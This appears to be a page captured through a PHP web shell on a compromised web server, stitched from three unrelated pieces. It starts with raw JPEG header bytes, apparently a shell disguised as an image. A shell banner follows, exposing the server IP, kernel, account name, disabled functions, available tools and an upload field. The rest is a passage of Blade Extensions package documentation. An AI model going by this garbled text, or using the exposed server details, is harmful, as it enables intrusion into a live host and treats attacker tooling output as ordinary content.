ÿØÿà JFIF H H ÿÛ C ÿÛ Cÿ " ÿÄ ÿÄ ÿÚ ±5¬€ ÿÄ àÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÄ àÿÚ ?! ÿÚ ÿÄ ÀÿÚ ? ÿÄ ÀÿÚ ? ÿÄ àÿÚ ? ÿÙ
| Server IP : 160.25.81.117 / Your IP : 216.73.216.137 Web Server : Apache/2 System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : bellizen ( 1045) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/bellizen/public_html/vendor/radic/blade-extensions/docs/directives/ |
Upload File : |
---
title: Markdown
subtitle: '@markdown'
---
#### Basic usage
Use the `@markdown` and `@endmarkdown` directives to render the markdown content.
```markdown
Somewhere in your view, you want to use markdown. Then you say
HEY!
@markdown
# And then start writing bbcode instead
**Cause thats gonna work***
@endmarkdown
```
### Minify CSS/JS
By default, only `@minify('html')` works. To enable javascript and css minification, add the `matthiasmullie/minify` package to your composer dependencies.
Blade Extensions automaticly detects the package and enables `@minify('js')` and `@minify('css')` directives. For more information, check out the directive's documentation page.
```json
"require": {
"matthiasmullie/minify": "~1.3"
}
```
### Markdown
Add your preferred Markdown parser to your composer dependencies. By default `erusev/parsedown` is enabled as renderer.
Check the markdown directive documentation page on how to implement custom a markdown parser.
```json
"require": {
"erusev/parsedown": "~1.5"
}
```
### Debug output
The `@dump($var)` directive will either use Symfony's `VarDumper` or the regular `var_dump` method.